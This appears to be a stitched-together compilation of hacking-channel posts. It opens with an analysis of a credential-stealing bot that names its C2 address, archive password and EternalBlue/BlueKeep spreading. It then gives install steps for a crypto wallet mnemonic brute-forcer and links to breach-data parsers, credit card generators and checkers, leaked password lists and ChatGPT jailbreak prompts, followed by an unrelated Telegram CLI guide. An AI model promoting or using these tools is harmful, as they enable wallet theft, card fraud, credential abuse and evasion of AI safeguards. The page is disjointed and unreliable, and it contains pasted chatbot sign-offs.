The execution of the malware encountered in the investigation shows activities performed by the attackers which included tree processes: cmd.exe, sqhost.exe and wmic.exe:

CMD.exe: was used to execute the following commands (some of the commands are broken into individual commands for readability):

the attackers attempted to execute C:\Windows\svchost.exe, which is the same file as sqhost.exe, and the attackers named it as svchost in earlier versions, but it wasn’t downloaded in the attack or in existence by this name. The reference for “svchost.exe” resides in different components of the malware, sometimes even in addition to “sqhost”. Our assumption is that it is used either for backwards-compatibility or it is the case that the attackers didn’t bother to change it in some places after renaming the main bot module to “sqhost.exe”.

Sqhost.exe: executed with “-watchdog” parameter, to make sure that it will keep running on the system.
Wmic.exe: was used to perform reconnaissance commands:
- wmic ComputerSystem get Model
- wmic OS get lastbootuptime
- wmic baseboard get product
- wmic os get caption


ExchDefender.exe
Exchdefender tries to masquerade as a “Microsoft Exchange Defender”, a non-existent program that masquerades as a legitimate Microsoft product.

When first executed, it creates a service named “Microsoft Exchange Defender” [MSExchangeDefenderPL] that is set to execute the binary (from C:\Windows) with the same command line as seen used with sqhost.exe - “Dcomsvc”:

Netwalker.7z

The Netwalker.7z archive downloaded from the C2 178.21.164[.]68 is password protected, using the password “horhor123”. The content of the archive is saved under C:\Windows\dell, together with the other components of the bot. The archive contains the following files: Nethelper2.exe, Nethelper4.exe, Windrlver.exe, a few DLLs,a copy of RdpcIip.exe and a few DLLs used by the bot components

RdpcIip.exe:

RdcIip.exe (with a capital “I” instead of a lowercase “L”) is both downloaded directly by sqhost.exe and is also contained in the Netwalker.7z archive". It is a key component of the malware. It has huge (trust us, huge) functionality with different branches with the main purpose being to interact with other components of the malware and make them work all together.

RdpcIip is responsible for some of the most important functions of the malware - harvesting credentials (using another component called Miwalk.exe) and spreading across the network using the stolen credentials as well as using the SMB exploit EternalBlue and the RDP exploit BlueKeep.

🦑Crypto-bruteforce:

Overview of Features:
1. Mnemonic Generation and Verification:
- Generates random BIP39 mnemonic phrases.
- Verifies mnemonics for Ethereum, BNB, and Dogecoin wallets.

2. Standalone Execution:
- Comes with precompiled binaries for direct use without needing Python installed.
- Binaries are available for download in its GitHub releases.

3. Automatic Setup:
- Automatically installs Python and dependencies (Cryptofuzz, Colorthon, Requests) if missing.
- Configures the environment for script execution.

4. Open Source:
- Fully open-source and accessible via GitHub.

---

### Installation & Usage:

#### 1. Standalone Binary:
- Download the binary file:
[DumperMnemonic.zip](https://github.com/welugroup/cryptocurency_catcher/releases/download/t/DumperMnemonic.zip)
- Extract and run the program without needing Python installed.

#### 2. Run with Git and Python:
- Clone the repository:

     git clone https://github.com/welugroup/cryptocurency_catcher
     cd cryptocurency_catcher
     python DumperMnemonic.py
     

#### 3. Install Python Libraries:
If you prefer manual installation:

   pip install cryptofuzz
   pip install colorthon
   pip install requests
   pip install requests-random-user-agent
   

Or install from the requirements file:

   pip install -r requirements.txt
   

#### 4. Running the Script:
- After dependencies are set:

     python DumperMnemonic.py
     

---

### Potential Uses:
1. Crypto Wallet Testing:
Generate and test mnemonic phrases for various blockchain networks.

2. Education and Learning:
Useful for understanding mnemonic creation, address derivation, and seed phrase management.

3. Exploration of Mnemonic Systems:
Analyze the security and randomness of generated mnemonics.

---

### GitHub Link:
Access the tool and documentation here:
[Dumper Mnemonic Repository](https://github.com/welugroup/cryptocurency_catcher)

Let me know if you'd like further assistance with setup or usage!

Breach Sites / Discovery Tools:

https://github.com/antonlindstrom/passpwn whatbreach h8mail hibp

https://github.com/hmaverickadams/breach-parse

https://github.com/KathanP19/BreachedDataScraper

https://github.com/ofarukcaki/dataleaks
https://github.com/xakepnz/BLUELAY https://github.com/jayyogesh/BaseQuery
https://github.com/artofscripting/PySearchBreachCompilation
https://github.com/chparmley/FB-Breach-Checker
https://github.com/FreiBj/data-breach-formatter
https://github.com/p4wnsolo/EmailPwnCheckerbot ( this is also a great Selenium example )
https://github.com/GihuMendes/breach-parse/blob/main/parser.sh ( parse COMB with simple Python )
https://github.com/SagarSRJ/Breach-Parser ( parse .csv )
https://github.com/davieking1/breachpearser ( parse COMB )
https://github.com/TheFern2/breach-parse.py/tree/main/breach_parse ( parse COMB - looks recent )
https://github.com/FreeZeroDays/breach-rip ( faster COMB parser )
https://github.com/alivirgo/read-a-password-file-huge-lists
https://github.com/martintjj/BreachCompilation ( tools in Breach Compilation - 4 yrs old )
https://github.com/jesusgoku/targz-search ( search .txt files within .tar.gz files )

🦑ChatGPT Jailbreaking prompts, exploits and other fun stuff:

https://gist.github.com/jahtzee/5d02b310b1d39b047664bec20a9be17c

🦑CC Generator:

https://github.com/KOUISAmine/credit-card-generator

🦑Mass CC Generator:

https://github.com/OshekharO/MASS-CC-CHECKER

🦑Top password lists generated from leaks collected from different paste sites:

https://github.com/rndinfosecguy/pastePasswordLists

🌐 Common Networking Port Numbers:

1️⃣ Port 22 (SSH): Used for Secure Shell (SSH) connections, enabling secure access to remote servers.
2️⃣ Port 80 (HTTP): The standard port for unencrypted web traffic; used by HTTP protocols for web browsing.
3️⃣ Port 443 (HTTPS): Secure HTTP port, vital for encrypted web traffic, ensuring safe data transfer online.
4️⃣ Port 53 (DNS): Domain Name System port, used for translating domain names to IP addresses.
5️⃣ Port 25 (SMTP): Simple Mail Transfer Protocol, responsible for email transmission.
6️⃣ Port 1433 (SQL Server): Microsoft SQL Server communication port, essential for database interactions.
7️⃣ Port 3389 (RDP): Remote Desktop Protocol port, used for remote access to Windows servers.
8️⃣ Port 3306 (MySQL): Default port for MySQL database connections.
9️⃣ Port 123 (NTP): Network Time Protocol, used to synchronize time across systems.

Source: Linkedin

🦑All best AI models in one place:

https://writingmate.ai/labs

🦑Use or automate Telegram like a pro

Telegram Messenger CLI:

A command-line interface (CLI) for Telegram that allows interacting with the Telegram messaging platform directly from the terminal. It provides features like messaging, contact management, and integration with the Telegram API, making it a powerful tool for developers and automation enthusiasts.

---

### Key Features:
1. API Integration: Full access to Telegram's API and MTProto protocol.
2. Command-Line Interaction:
- Messaging.
- Managing contacts and chats.
- Forwarding and deleting messages.
3. Customization:
- Supports TAB completion and command history.
- Configurable paths for server keys and data files.
4. Cross-Platform Compatibility:
- Available for Linux, BSDs, macOS, and other Unix-like systems.
5. Extensibility:
- Python integration for scripting and automation.

---

### Installation:

#### Clone Repository:

git clone --recursive https://github.com/vysheng/tg.git && cd tg

#### Dependencies:
Install the required libraries:

- Ubuntu/Debian:

  sudo apt-get install libreadline-dev libconfig-dev libssl-dev lua5.2 liblua5.2-dev libevent-dev libjansson-dev libpython-dev make
  

- Fedora:

  sudo dnf install lua-devel openssl-devel libconfig-devel readline-devel libevent-devel libjansson-devel python-devel
  

- Arch Linux:

  yaourt -S telegram-cli-git
  

- macOS (Homebrew):

  brew install libconfig readline lua python libevent jansson
  export CFLAGS="-I/usr/local/include -I/usr/local/Cellar/readline/6.3.8/include"
  export LDFLAGS="-L/usr/local/lib -L/usr/local/Cellar/readline/6.3.8/lib"
  

#### Build and Configure:

./configure
make

---

### Usage:

#### Basic Run:

bin/telegram-cli -k tg-server.pub

#### Commands:
- Messaging:

  msg <peer> <Text>
  fwd <user> <msg-seqno>
  mark_read <peer>
  

- Contacts:

  add_contact <phone-number> <first-name> <last-name>
  rename_contact <user> <first-name> <last-name>
  

- Chats:

  chat_with_peer <peer>
  

- Message Management:

  delete_msg <msg-seqno>
  restore_msg <msg-seqno>
  

#### Special Notes:
- Use TAB to auto-complete peer names and commands.
- Peer names:
- Users: Replace spaces with underscores (e.g., John_Doe).
- Chats: Use the chat title, replacing spaces with underscores.
- Encrypted chats: Prefix with ! (e.g., !John_Doe).

---

### Upgrading:
When upgrading to version 1.0:
1. Binary moved to ./bin and renamed to telegram-cli.
2. Config directory updated to ${HOME}/.telegram-cli.
3. Requires re-login due to database incompatibility.
4. Peer names now use @ instead of #.

---

### GitHub Repository:
Find the full documentation, source code, and issue tracker here:
[Telegram CLI Repository](https://github.com/vysheng/tg)

---

This tool is ideal for automation, server-side Telegram management, and for developers looking to integrate Telegram functionality into their workflows. Let me know if you'd like further help with scripting or configuring Telegram CLI!